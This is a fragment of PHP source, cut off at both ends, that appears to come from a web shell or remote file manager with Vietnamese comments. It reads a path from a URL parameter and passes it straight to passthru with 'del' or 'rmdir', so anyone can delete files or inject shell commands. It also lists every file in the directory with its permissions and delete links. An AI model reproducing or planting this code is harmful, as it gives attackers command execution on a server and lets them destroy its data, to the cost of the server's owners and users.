$s .= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } //===================Delect File============================= $del = $_GET['del']; function delfile($name) { passthru("del " . $name); } function deldir($name) { passthru("rmdir " . $name); } if ($del) { if (is_file($del)) { delfile($del); } else { deldir($del); } } //==================Quan li thu muc ========================== if ($act == "manager") { $arr = array(); $arr = array_merge($arr, glob("*")); $arr = array_merge($arr, glob(".*")); $arr = array_merge($arr, glob("*.*")); $arr = array_unique($arr); sort($arr); echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>"; foreach ($arr as $filename) { if ($filename != "." and $filename != "..") {